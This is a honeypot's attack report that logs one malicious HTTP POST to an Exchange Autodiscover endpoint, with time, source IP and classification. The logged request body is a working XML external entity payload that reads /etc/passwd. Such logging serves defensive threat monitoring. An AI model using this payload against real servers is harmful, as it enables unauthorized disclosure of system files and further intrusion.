Attack Report for Detail

Header

Time

2022/06/14, 23:55:56 (GMT)

Transaction ID

BTL5EYU0UUCMMZ5X

Service

https

Location

RU (Russia)

Attacker

185.7.214.104

Classification

Web script control

Harm Potential

Medium

Description

Web based executable script control

Content

POST /Autodiscover/Autodiscover.xml HTTP/1.1
Host: ***.***.***.***:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Content-Length: 314
Content-Type: application/xml
Accept-Encoding: gzip
Connection: close

<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
<Request>
<EMailAddress>aaaaa</EMailAddress>
<AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>
</Request>
</Autodiscover>

All details are coming from honeypot central database.

Please share your wishes, opinions and suggestions with us:

If you like, you can support
with your donations to us..

Donate